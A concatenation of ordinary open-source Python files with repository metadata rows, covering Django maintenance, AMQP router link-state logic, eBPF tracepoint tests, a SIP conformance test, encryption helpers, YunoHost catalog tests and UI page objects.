self.stdout.write('Beginning update...\n')
users = User.objects.all()
for user in users:
self._delete_dup_history(user)
self.stdout.write('Update complete.\n')
def _delete_dup_history(self, user):
items = EyeHistory.objects.filter(user=user)
for item in items:
objs = EyeHistory.objects.filter(
user=user, url=item.url,
domain=item.domain, title=item.title,
total_time=item.total_time, src=item.src)
            if objs.count() > 1:
for obj in objs[1:]:
self.stdout.write('Deleting: %s\n' % item)
obj.delete()
| haystack/eyebrowse-server | common/management/commands/remove_duplicate_history.py | Python | mit | 949 | 0 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from .data import MessageRA, MessageLSU, MessageLSR
from ..dispatch import LOG_TRACE
class LinkStateEngine:
"""
This module is responsible for running the Link State protocol.
"""
def __init__(self, container):
self.container = container
self.node_tracker = container.node_tracker
self.id = self.container.id
self.ra_interval_stable = self.container.config.raIntervalSeconds
self.ra_interval_flux = self.container.config.raIntervalFluxSeconds
self.last_ra_time = 0
self.mobile_seq = 0
def set_mobile_seq(self, mobile_seq):
self.mobile_seq = mobile_seq
def tick(self, now):
interval = self.ra_interval_stable
if self.node_tracker.in_flux_mode(now):
interval = self.ra_interval_flux
if now - self.last_ra_time >= interval:
self.send_ra(now)
def handle_ra(self, msg, now):
if msg.id == self.id:
return
self.node_tracker.ra_received(msg.id, msg.version, msg.ls_seq, msg.mobile_seq, msg.instance, now)
def handle_lsu(self, msg, now):
if msg.id == self.id:
return
self.node_tracker.link_state_received(msg.id, msg.version, msg.ls, msg.instance, now)
def handle_lsr(self, msg, now):
if msg.id == self.id:
return
self.node_tracker.router_learned(msg.id, msg.version)
my_ls = self.node_tracker.link_state
smsg = MessageLSU(None, self.id, my_ls.ls_seq, my_ls, self.container.instance)
self.container.send('amqp:/_topo/%s/%s/qdrouter' % (msg.area, msg.id), smsg)
self.container.log_ls(LOG_TRACE, "SENT: %r" % smsg)
def send_lsr(self, _id):
msg = MessageLSR(None, self.id)
self.container.send('amqp:/_topo/0/%s/qdrouter' % _id, msg)
self.container.log_ls(LOG_TRACE, "SENT: %r to: %s" % (msg, _id))
def send_ra(self, now):
self.last_ra_time = now
ls_seq = self.node_tracker.link_state.ls_seq
msg = MessageRA(None, self.id, ls_seq, self.mobile_seq, self.container.instance)
self.container.send('amqp:/_topo/0/all/qdrouter', msg)
self.container.log_ls(LOG_TRACE, "SENT: %r" % msg)
| ChugR/qpid-dispatch | python/qpid_dispatch_internal/router/link.py | Python | apache-2.0 | 3,006 | 0.002329 |
from google.appengine.ext import db
class MyEntity(db.Model):
name = db.StringProperty()
| toomoresuch/pysonengine | parts/gaeunit/sample_app/model.py | Python | mit | 92 | 0.021739 |
#!/usr/bin/env python
# Copyright (c) Sasha Goldshtein
# Licensed under the Apache License, Version 2.0 (the "License")
import bcc
import unittest
from time import sleep
import distutils.version
import os
import subprocess
def kernel_version_ge(major, minor):
# True if running kernel is >= X.Y
version = distutils.version.LooseVersion(os.uname()[2]).version
if version[0] > major:
return True
if version[0] < major:
return False
if minor and version[1] < minor:
return False
return True
@unittest.skipUnless(kernel_version_ge(4,7), "requires kernel >= 4.7")
class TestTracepoint(unittest.TestCase):
def test_tracepoint(self):
text = """
BPF_HASH(switches, u32, u64);
TRACEPOINT_PROBE(sched, sched_switch) {
u64 val = 0;
u32 pid = args->next_pid;
u64 *existing = switches.lookup_or_init(&pid, &val);
(*existing)++;
return 0;
}
"""
b = bcc.BPF(text=text)
sleep(1)
total_switches = 0
for k, v in b["switches"].items():
total_switches += v.value
self.assertNotEqual(0, total_switches)
@unittest.skipUnless(kernel_version_ge(4,7), "requires kernel >= 4.7")
class TestTracepointDataLoc(unittest.TestCase):
def test_tracepoint_data_loc(self):
text = """
struct value_t {
char filename[64];
};
BPF_HASH(execs, u32, struct value_t);
TRACEPOINT_PROBE(sched, sched_process_exec) {
struct value_t val = {0};
char fn[64];
u32 pid = args->pid;
struct value_t *existing = execs.lookup_or_init(&pid, &val);
TP_DATA_LOC_READ_CONST(fn, filename, 64);
__builtin_memcpy(existing->filename, fn, 64);
return 0;
}
"""
b = bcc.BPF(text=text)
subprocess.check_output(["/bin/ls"])
sleep(1)
self.assertTrue("/bin/ls" in [v.filename.decode()
for v in b["execs"].values()])
if __name__ == "__main__":
unittest.main()
| shodoco/bcc | tests/python/test_tracepoint.py | Python | apache-2.0 | 2,128 | 0.00282 |
#
# Copyright (C) 2004 SIPfoundry Inc.
# Licensed by SIPfoundry under the GPL license.
#
# Copyright (C) 2004 SIP Forum
# Licensed to SIPfoundry under a Contributor Agreement.
#
#
# This file is part of SIP Forum User Agent Basic Test Suite which
# belongs to the SIP Forum Test Framework.
#
# SIP Forum User Agent Basic Test Suite is free software; you can
# redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# SIP Forum User Agent Basic Test Suite is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SIP Forum User Agent Basic Test Suite; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
#
# $Id: case207.py,v 1.2 2004/05/02 18:57:35 lando Exp $
#
from TestCase import TestCase
import NetworkEventHandler as NEH
import Log
class case207 (TestCase):
def config(self):
self.name = "Case 207"
self.description = "Content length larger than message"
self.isClient = True
self.transport = "UDP"
def run(self):
self.neh = NEH.NetworkEventHandler(self.transport)
inv = self.createRequest("INVITE")
cl = inv.getParsedHeaderValue("Content-Length")
cl.length = 9999
inv.setHeaderValue("Content-Length", cl.create())
self.writeMessageToNetwork(self.neh, inv)
self.code = 0
while (self.code <= 200):
repl = self.readReplyFromNetwork(self.neh)
if (repl is not None) and (repl.code > self.code):
self.code = repl.code
elif repl is None:
self.code = 999
if repl is None:
self.addResult(TestCase.TC_FAILED, "missing reply on request")
self.neh.closeSock()
def onDefaultCode(self, message):
if message.code > self.code:
self.code = message.code
if message.code >= 200:
if message.getParsedHeaderValue("CSeq").method == "INVITE":
Log.logDebug("case207: sending ACK for >= 200 reply", 3)
ack = self.createRequest("ACK", trans=message.transaction)
self.writeMessageToNetwork(self.neh, ack)
if message.code == 400:
self.addResult(TestCase.TC_PASSED, "INVITE rejected with 400")
elif message.code == 200:
if message.transaction.canceled:
Log.logDebug("case207: received 200 for CANCEL", 3)
else:
Log.logDebug("case207: sending BYE for accepted INVITE", 3)
bye = self.createRequest("BYE", dia=message.transaction.dialog)
self.writeMessageToNetwork(self.neh, bye)
rep = self.readReplyFromNetwork(self.neh)
if rep is None:
self.addResult(TestCase.TC_ERROR, "missing response on BYE")
elif message.code != 487:
self.addResult(TestCase.TC_FAILED, "INVITE rejected, but not with 400")
else:
self.addResult(TestCase.TC_FAILED, "INVITE accepted, not rejected with 400")
can = self.createRequest("CANCEL", trans=message.transaction)
message.transaction.canceled = True
self.writeMessageToNetwork(self.neh, can)
canrepl = self.readReplyFromNetwork(self.neh)
if canrepl is None:
self.addResult(TestCase.TC_ERROR, "missing 200 on CANCEL")
| ezigman/sftf | UserAgentBasicTestSuite/case207.py | Python | gpl-2.0 | 3,360 | 0.018155 |
import libnacl.secret
import libnacl.utils
from StringIO import StringIO
from .response import FileObjResponse
from pyramid.httpexceptions import HTTPBadRequest
def generate_secret_key():
return libnacl.utils.salsa_key().encode('hex')
def encrypt_file(key, fileobj, nonce=None):
if nonce is None:
nonce = libnacl.utils.rand_nonce()
box = libnacl.secret.SecretBox(key.decode('hex'))
encrypted = box.encrypt(fileobj.read(), nonce)
return StringIO(encrypted)
def decrypt_file(key, fileobj):
box = libnacl.secret.SecretBox(key.decode('hex'))
decrypted = box.decrypt(fileobj.read())
return StringIO(decrypted)
def validate_key(view_callable):
def inner(context, request):
key = request.params.get('key')
if key is None:
raise HTTPBadRequest('Key missed.')
if len(key) != 64:
raise HTTPBadRequest('The key must be exactly 32 bytes long.')
try:
key.decode('hex')
except TypeError:
raise HTTPBadRequest('Invalid key: Non-hexadecimal digit found.')
return view_callable(context, request)
return inner
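# Example use (sketch, hypothetical view name): wrap a Pyramid view callable so the
# request must carry a valid 64-hex-character 'key' parameter before the view runs:
#
#   @validate_key
#   def download_view(context, request):
#       ...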
| Leits/openprocurement.api.encryprion | openprocurement/api/encryprion/utils.py | Python | apache-2.0 | 1,144 | 0 |
# encoding: utf-8
'''
Tests for various attachment thingies
Created on Oct 21, 2013
@author: pupssman
'''
import pytest
from hamcrest import has_entries, assert_that, is_, contains, has_property
from allure.constants import AttachmentType
from allure.utils import all_of
@pytest.mark.parametrize('package', ['pytest.allure', 'allure'])
def test_smoke(report_for, package):
report = report_for("""
import pytest
import allure
def test_x():
%s.attach('Foo', 'Bar')
""" % package)
assert_that(report.findall('test-cases/test-case/attachments/attachment'), contains(has_property('attrib', has_entries(title='Foo'))))
@pytest.mark.parametrize('a_type', map(lambda x: x[0], all_of(AttachmentType)))
def test_attach_types(report_for, a_type):
report = report_for("""
import allure as A
def test_x():
A.attach('Foo', 'Bar', A.attach_type.%s)
""" % a_type)
assert_that(report.find('.//attachment').attrib, has_entries(title='Foo', type=getattr(AttachmentType, a_type).mime_type))
class TestContents:
@pytest.fixture
def attach_contents(self, report_for, reportdir):
"""
Fixture that returns contents of the attachment file for given attach body
"""
def impl(body):
report = report_for("""
from pytest import allure as A
def test_x():
A.attach('Foo', %s, A.attach_type.TEXT)
""" % repr(body))
filename = report.find('.//attachment').get('source')
return reportdir.join(filename).read('rb')
return impl
def test_ascii(self, attach_contents):
assert_that(attach_contents('foo\nbar\tbaz'), is_(b'foo\nbar\tbaz'))
def test_unicode(self, attach_contents):
assert_that(attach_contents(u'ололо пыщьпыщь').decode('utf-8'), is_(u'ололо пыщьпыщь'))
def test_broken_unicode(self, attach_contents):
assert_that(attach_contents(u'ололо пыщьпыщь'.encode('cp1251')), is_(u'ололо пыщьпыщь'.encode('cp1251')))
def test_attach_in_fixture_teardown(report_for):
"""
Check that calling ``pytest.allure.attach`` in fixture teardown works and attaches it there.
"""
report = report_for("""
import pytest
@pytest.yield_fixture(scope='function')
def myfix():
yield
pytest.allure.attach('Foo', 'Bar')
def test_x(myfix):
assert True
""")
assert_that(report.find('.//attachment').attrib, has_entries(title='Foo'))
| pvarenik/PyCourses | allure-python-master/tests/test_attach.py | Python | gpl-2.0 | 2,550 | 0.002402 |
SCORES = {'A': 100, 'B': 14, 'C': 9, 'D': 28, 'E': 145, 'F': 12, 'G': 3,
'H': 10, 'I': 200, 'J': 100, 'K': 114, 'L': 100, 'M': 25,
'N': 450, 'O': 80, 'P': 2, 'Q': 12, 'R': 400, 'S': 113, 'T': 405,
'U': 11, 'V': 10, 'W': 10, 'X': 3, 'Y': 210, 'Z': 23}
def sexy_name(name):
name_score = sum(SCORES.get(a, 0) for a in name.upper())
if name_score >= 600:
return 'THE ULTIMATE SEXIEST'
elif name_score >= 301:
return 'VERY SEXY'
elif name_score >= 60:
return 'PRETTY SEXY'
return 'NOT TOO SEXY'
| the-zebulan/CodeWars | katas/beta/how_sexy_is_your_name.py | Python | mit | 566 | 0 |
# external imports
import unittest
# local imports
import nautilus
from nautilus.api.endpoints import GraphQLRequestHandler
from ..util import Mock
class TestUtil(unittest.TestCase):
def setUp(self):
# create a service without an explict name
class MyService(nautilus.Service): pass
# save the service record to the test suite
self.service = MyService
def test_has_default_name(self):
# make sure the name matches
assert self.service.name == 'myService', (
"Service did not have the correct name."
)
def test_default_name_can_have_numbers(self):
# create a service without an explict name
class TestService1(nautilus.Service): pass
# make sure the name is what we expect
assert TestService1.name == 'testService1', (
"Service did not have the correct name with number."
)
def test_can_accept_name(self):
class MyService(nautilus.Service):
name = 'foo'
assert MyService.name == 'foo', (
"Service could not recieve custom name."
)
def test_can_initialize_with_schema(self):
# create a mock schema
schema = Mock()
# make sure the internal schema is what we gave it
assert self.service(schema=schema).schema == schema, (
"Service could not be initialized with a specific schema"
)
def test_can_accept_config(self):
# create a config object
config = nautilus.Config(foo='bar')
# make sure the config is what we gave it
assert self.service(config=config).config == config, (
"Service could not be initialized with a specific config."
)
def test_can_merge_config_from_init(self):
# the config of the base class
base_config = nautilus.Config(foo='bar')
# the config to initialize with
init_config = nautilus.Config(foo='baz', wakka='flokka')
class MyConfiguredService(nautilus.Service):
config = base_config
# the mix of the two config
mix_config = base_config.copy()
mix_config.update(init_config)
assert MyConfiguredService(config=init_config).config == mix_config, (
"Service could not mix the initialized config onto the base one."
)
def test_has_request_handler(self):
# check the value of the internal attribute
assert issubclass(self.service().api_request_handler_class, GraphQLRequestHandler), (
"APIGateway did not have the right request handler class"
)
def test_can_summarize(self):
# the target summary
target = {
'name': 'myService',
}
# summarize the service
summarized = self.service().summarize()
# make sure the names match up
assert target['name'] == summarized['name'], (
"Summarzied service did not have the right name."
) | aaivazis/nautilus | tests/services/test_service.py | Python | mit | 2,991 | 0.003678 |
import json
from stats import read_stats
@read_stats
def read_file(file_name, default='"?"'):
try:
file = open(file_name, 'r')
except FileNotFoundError:
print('Creating file {}'.format(file_name))
file = open(file_name, 'w+')
file.write(default)
contents = json.loads(file.read())
file.close()
return contents
def write_file(file_name, data, indent=4):
with open(file_name, 'w+') as file:
file.write(
json.dumps(
data,
sort_keys=True,
indent=indent))
| nickdrozd/ecio-lisp | fileio.py | Python | mit | 581 | 0.003442 |
import os
import pytest
import requests
import requests_mock
import glob
import shutil
from moulinette import m18n
from moulinette.utils.filesystem import read_json, write_to_json, write_to_yaml
from yunohost.utils.error import YunohostError
from yunohost.app import (
_initialize_apps_catalog_system,
_read_apps_catalog_list,
_update_apps_catalog,
_actual_apps_catalog_api_url,
_load_apps_catalog,
app_catalog,
logger,
APPS_CATALOG_CACHE,
APPS_CATALOG_CONF,
APPS_CATALOG_API_VERSION,
APPS_CATALOG_DEFAULT_URL,
)
APPS_CATALOG_DEFAULT_URL_FULL = _actual_apps_catalog_api_url(APPS_CATALOG_DEFAULT_URL)
DUMMY_APP_CATALOG = """{
"apps": {
"foo": {"id": "foo", "level": 4, "category": "yolo", "manifest":{"description": "Foo"}},
"bar": {"id": "bar", "level": 7, "category": "swag", "manifest":{"description": "Bar"}}
},
"categories": [
{"id": "yolo", "description": "YoLo", "title": {"en": "Yolo"}},
{"id": "swag", "description": "sWaG", "title": {"en": "Swag"}}
]
}
"""
class AnyStringWith(str):
def __eq__(self, other):
return self in other
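# Note: AnyStringWith("foo") compares equal to any string containing "foo", so mock
# assertions such as logger.warning.assert_any_call(AnyStringWith("Duplicate")) can
# match on a substring of the logged message.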
def setup_function(function):
# Clear apps catalog cache
shutil.rmtree(APPS_CATALOG_CACHE, ignore_errors=True)
# Clear apps_catalog conf
if os.path.exists(APPS_CATALOG_CONF):
os.remove(APPS_CATALOG_CONF)
def teardown_function(function):
# Clear apps catalog cache
# Otherwise when using apps stuff after running the test,
# we'll still have the dummy unusable list
shutil.rmtree(APPS_CATALOG_CACHE, ignore_errors=True)
#
# ################################################
#
def test_apps_catalog_init(mocker):
# Cache is empty
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
# Conf doesn't exist yet
assert not os.path.exists(APPS_CATALOG_CONF)
# Initialize ...
mocker.spy(m18n, "n")
_initialize_apps_catalog_system()
m18n.n.assert_any_call("apps_catalog_init_success")
# And a conf with at least one list
assert os.path.exists(APPS_CATALOG_CONF)
apps_catalog_list = _read_apps_catalog_list()
assert len(apps_catalog_list)
# Cache is expected to still be empty though
# (if we did update the apps_catalog during init,
# we couldn't differentiate easily exceptions
# related to lack of network connectivity)
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
def test_apps_catalog_emptylist():
# Initialize ...
_initialize_apps_catalog_system()
    # Let's imagine somebody removed the default apps catalog because, uh, idk, they don't want to use our default apps catalog
os.system("rm %s" % APPS_CATALOG_CONF)
os.system("touch %s" % APPS_CATALOG_CONF)
apps_catalog_list = _read_apps_catalog_list()
assert not len(apps_catalog_list)
def test_apps_catalog_update_nominal(mocker):
# Initialize ...
_initialize_apps_catalog_system()
# Cache is empty
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
# Update
with requests_mock.Mocker() as m:
# Mock the server response with a dummy apps catalog
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_updating")
m18n.n.assert_any_call("apps_catalog_update_success")
    # Cache shouldn't be empty anymore
assert glob.glob(APPS_CATALOG_CACHE + "/*")
# And if we load the catalog, we sould find
# - foo and bar as apps (unordered),
# - yolo and swag as categories (ordered)
catalog = app_catalog(with_categories=True)
assert "apps" in catalog
assert set(catalog["apps"].keys()) == set(["foo", "bar"])
assert "categories" in catalog
assert [c["id"] for c in catalog["categories"]] == ["yolo", "swag"]
def test_apps_catalog_update_404(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# 404 error
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, status_code=404)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_update_timeout(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# Timeout
m.register_uri(
"GET", APPS_CATALOG_DEFAULT_URL_FULL, exc=requests.exceptions.ConnectTimeout
)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_update_sslerror(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# SSL error
m.register_uri(
"GET", APPS_CATALOG_DEFAULT_URL_FULL, exc=requests.exceptions.SSLError
)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_update_corrupted(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# Corrupted json
m.register_uri(
"GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG[:-2]
)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_load_with_empty_cache(mocker):
# Initialize ...
_initialize_apps_catalog_system()
# Cache is empty
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
# Update
with requests_mock.Mocker() as m:
# Mock the server response with a dummy apps catalog
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
# Try to load the apps catalog
# This should implicitly trigger an update in the background
mocker.spy(m18n, "n")
app_dict = _load_apps_catalog()["apps"]
m18n.n.assert_any_call("apps_catalog_obsolete_cache")
m18n.n.assert_any_call("apps_catalog_update_success")
    # Cache shouldn't be empty anymore
assert glob.glob(APPS_CATALOG_CACHE + "/*")
assert "foo" in app_dict.keys()
assert "bar" in app_dict.keys()
def test_apps_catalog_load_with_conflicts_between_lists(mocker):
# Initialize ...
_initialize_apps_catalog_system()
conf = [
{"id": "default", "url": APPS_CATALOG_DEFAULT_URL},
{
"id": "default2",
"url": APPS_CATALOG_DEFAULT_URL.replace("yunohost.org", "yolohost.org"),
},
]
write_to_yaml(APPS_CATALOG_CONF, conf)
# Update
with requests_mock.Mocker() as m:
# Mock the server response with a dummy apps catalog
# + the same apps catalog for the second list
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
m.register_uri(
"GET",
APPS_CATALOG_DEFAULT_URL_FULL.replace("yunohost.org", "yolohost.org"),
text=DUMMY_APP_CATALOG,
)
# Try to load the apps catalog
# This should implicitly trigger an update in the background
mocker.spy(logger, "warning")
app_dict = _load_apps_catalog()["apps"]
logger.warning.assert_any_call(AnyStringWith("Duplicate"))
    # Cache shouldn't be empty anymore
assert glob.glob(APPS_CATALOG_CACHE + "/*")
assert "foo" in app_dict.keys()
assert "bar" in app_dict.keys()
def test_apps_catalog_load_with_oudated_api_version(mocker):
# Initialize ...
_initialize_apps_catalog_system()
# Update
with requests_mock.Mocker() as m:
mocker.spy(m18n, "n")
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
_update_apps_catalog()
    # Cache shouldn't be empty anymore
assert glob.glob(APPS_CATALOG_CACHE + "/*")
# Tweak the cache to replace the from_api_version with a different one
for cache_file in glob.glob(APPS_CATALOG_CACHE + "/*"):
cache_json = read_json(cache_file)
assert cache_json["from_api_version"] == APPS_CATALOG_API_VERSION
cache_json["from_api_version"] = 0
write_to_json(cache_file, cache_json)
# Update
with requests_mock.Mocker() as m:
# Mock the server response with a dummy apps catalog
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
mocker.spy(m18n, "n")
app_dict = _load_apps_catalog()["apps"]
m18n.n.assert_any_call("apps_catalog_update_success")
assert "foo" in app_dict.keys()
assert "bar" in app_dict.keys()
# Check that we indeed have the new api number in cache
for cache_file in glob.glob(APPS_CATALOG_CACHE + "/*"):
cache_json = read_json(cache_file)
assert cache_json["from_api_version"] == APPS_CATALOG_API_VERSION
| YunoHost/moulinette-yunohost | src/yunohost/tests/test_appscatalog.py | Python | agpl-3.0 | 9,247 | 0.001406 |
#!/usr/bin/env python
import matplotlib.pyplot as plt
import sys
import numpy
from math import floor
def movingAverage(x, N):
cumsum = numpy.cumsum(numpy.insert(x, 0, 0))
return (cumsum[N:] - cumsum[:-N])/N
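# Note: the cumulative-sum trick above computes the length-N sliding mean in O(len(x));
# element i of the result is the mean of x[i:i+N].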
filename = "reports/configuration.confrewardRecordReport.txt"
if (len(sys.argv) > 1):
filename = sys.argv[1]
with open(filename) as f:
print f.readline()
time = []
temp = []
avg = []
for line in f:
entry = line.split(":")
time.append(float(entry[0]))
temp.append(float(entry[1]))
windowSize = 100
avg = [0] * (windowSize - 1)
avg = avg + list( movingAverage(temp, windowSize))
ratio = 0.999
avg = avg[int(floor(len(avg )*ratio)): len(avg )-1]
time = time[int(floor(len(time)*ratio)): len(time)-1]
temp = temp[int(floor(len(temp)*ratio)): len(temp)-1]
plt.plot(time, temp, 'r-')
plt.plot(time, avg, 'ro')
plt.show()
| Jacques-Florence/schedSim | src/analysis/reward.py | Python | bsd-3-clause | 847 | 0.022432 |
# -*- coding: utf-8 -*-
import attr
from navmazing import NavigateToAttribute, NavigateToSibling
from widgetastic.widget import View, Select
from widgetastic_manageiq import (
Accordion, BaseEntitiesView, BootstrapSelect, BreadCrumb, ItemsToolBarViewSelector,
ManageIQTree, SummaryTable, Text, TextInput)
from widgetastic_patternfly import Dropdown, Button
from cfme.base.ui import BaseLoggedInPage
from cfme.exceptions import ItemNotFound, SecurityGroupsNotFound
from cfme.modeling.base import BaseCollection, BaseEntity
from cfme.utils.appliance.implementations.ui import navigate_to, navigator, CFMENavigateStep
from cfme.utils.blockers import BZ
from cfme.utils.wait import wait_for
class SecurityGroupToolbar(View):
configuration = Dropdown('Configuration')
policy = Dropdown('Policy')
download = Dropdown('Download')
view_selector = View.nested(ItemsToolBarViewSelector)
class SecurityGroupDetailsToolbar(View):
configuration = Dropdown('Configuration')
policy = Dropdown('Policy')
download = Button(title='Download summary in PDF format')
class SecurityGroupDetailsAccordion(View):
@View.nested
class properties(Accordion): # noqa
tree = ManageIQTree()
@View.nested
class relationships(Accordion): # noqa
tree = ManageIQTree()
class SecurityGroupDetailsEntities(View):
breadcrumb = BreadCrumb()
title = Text('//div[@id="main-content"]//h1')
properties = SummaryTable(title='Properties')
relationships = SummaryTable(title='Relationships')
smart_management = SummaryTable(title='Smart Management')
firewall_rules = SummaryTable(title="Firewall Rules")
class SecurityGroupAddEntities(View):
breadcrumb = BreadCrumb()
title = Text('//div[@id="main-content"]//h1')
class SecurityGroupAddForm(View):
network_manager = BootstrapSelect(id='ems_id')
name = TextInput(name='name')
description = TextInput(name='description')
cloud_tenant = Select(name='cloud_tenant_id')
add = Button('Add')
cancel = Button('Cancel')
class SecurityGroupView(BaseLoggedInPage):
"""Base view for header and nav checking, navigatable views should inherit this"""
@property
def in_security_groups(self):
return(
self.logged_in_as_current_user and
self.navigation.currently_selected == ['Networks', 'Security Groups'])
class SecurityGroupAllView(SecurityGroupView):
@property
def is_displayed(self):
return (
self.in_security_groups and
self.entities.title.text == 'Security Groups')
toolbar = View.nested(SecurityGroupToolbar)
including_entities = View.include(BaseEntitiesView, use_parent=True)
class SecurityGroupDetailsView(SecurityGroupView):
@property
def is_displayed(self):
expected_title = '{} (Summary)'.format(self.context['object'].name)
return (
self.in_security_groups and
self.entities.title.text == expected_title and
self.entities.breadcrumb.active_location == expected_title)
toolbar = View.nested(SecurityGroupDetailsToolbar)
sidebar = View.nested(SecurityGroupDetailsAccordion)
entities = View.nested(SecurityGroupDetailsEntities)
class SecurityGroupAddView(SecurityGroupView):
@property
def is_displayed(self):
return (
self.in_security_groups and
self.entities.breadcrumb.active_location == 'Add New Security Group' and
self.entities.title.text == 'Add New Security Group')
entities = View.nested(SecurityGroupAddEntities)
form = View.nested(SecurityGroupAddForm)
@attr.s
class SecurityGroup(BaseEntity):
""" Automate Model page of SecurityGroup
Args:
provider (obj): Provider name for Network Manager
name(str): name of the Security Group
description (str): Security Group description
"""
_param_name = "SecurityGroup"
name = attr.ib()
provider = attr.ib()
description = attr.ib(default="")
def refresh(self):
self.provider.refresh_provider_relationships()
self.browser.refresh()
def delete(self, cancel=False, wait=False):
view = navigate_to(self, 'Details')
view.toolbar.configuration.item_select('Delete this Security Group',
handle_alert=(not cancel))
# cancel doesn't redirect, confirmation does
view.flush_widget_cache()
if not cancel:
view = self.create_view(SecurityGroupAllView)
view.is_displayed
view.flash.assert_success_message('Delete initiated for 1 Security Group.')
if wait:
wait_for(
lambda: self.name in view.entities.all_entity_names,
message="Wait Security Group to disappear",
fail_condition=True,
num_sec=500,
timeout=1000,
delay=20,
fail_func=self.refresh
)
@property
def exists(self):
try:
navigate_to(self, 'Details')
except SecurityGroupsNotFound:
return False
else:
return True
@attr.s
class SecurityGroupCollection(BaseCollection):
""" Collection object for the :py:class: `cfme.cloud.SecurityGroup`. """
ENTITY = SecurityGroup
def create(self, name, description, provider, cancel=False, wait=False):
"""Create new Security Group.
Args:
provider (obj): Provider name for Network Manager
name (str): name of the Security Group
description (str): Security Group description
cancel (boolean): Cancel Security Group creation
wait (boolean): wait if Security Group created
"""
view = navigate_to(self, 'Add')
changed = view.form.fill({'network_manager': "{} Network Manager".format(provider.name),
'name': name,
'description': description,
'cloud_tenant': 'admin'})
if cancel and changed:
view.form.cancel.click()
flash_message = 'Add of new Security Group was cancelled by the user'
else:
view.form.add.click()
flash_message = 'Security Group "{}" created'.format(name)
# add/cancel should redirect, new view
view = self.create_view(SecurityGroupAllView)
view.flash.assert_success_message(flash_message)
view.entities.paginator.set_items_per_page(500)
sec_groups = self.instantiate(name, provider, description)
if wait:
wait_for(
lambda: sec_groups.name in view.entities.all_entity_names,
message="Wait Security Group to appear",
num_sec=400,
timeout=1000,
delay=20,
fail_func=sec_groups.refresh,
handle_exception=True
)
return sec_groups
# TODO: Delete collection as Delete option is not available on List view and update
@navigator.register(SecurityGroupCollection, 'All')
class SecurityGroupAll(CFMENavigateStep):
VIEW = SecurityGroupAllView
prerequisite = NavigateToAttribute('appliance.server', 'LoggedIn')
def step(self, *args, **kwargs):
self.prerequisite_view.navigation.select('Networks', 'Security Groups')
@navigator.register(SecurityGroup, 'Details')
class Details(CFMENavigateStep):
VIEW = SecurityGroupDetailsView
prerequisite = NavigateToAttribute('parent', 'All')
def step(self, *args, **kwargs):
try:
self.prerequisite_view.entities.get_entity(name=self.obj.name, surf_pages=True).click()
except ItemNotFound:
raise SecurityGroupsNotFound("Security Groups {} not found".format(
self.obj.name))
@navigator.register(SecurityGroupCollection, 'Add')
class Add(CFMENavigateStep):
VIEW = SecurityGroupAddView
prerequisite = NavigateToSibling("All")
def step(self, *args, **kwargs):
"""Raises DropdownItemDisabled from widgetastic_patternfly
if no RHOS Network manager present"""
# Todo remove when fixed 1520669
if (BZ(1520669, forced_streams='5.9').blocks and
self.prerequisite_view.flash.messages):
self.prerequisite_view.flash.dismiss()
self.prerequisite_view.toolbar.configuration.item_select('Add a new Security Group')
| akarol/cfme_tests | cfme/cloud/security_groups.py | Python | gpl-2.0 | 8,515 | 0.001292 |
import gpbo
xrange=range
from gpbo.core import GPdc as GPdc
import scipy as sp
class eimledefault():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.EIMAPaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'mprior': sp.array([1.]+[-1]*D),
'sprior': sp.array([2.]*(D+1)),
'kindex': GPdc.MAT52,
'maxf':500+100*D,
'overhead':None,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
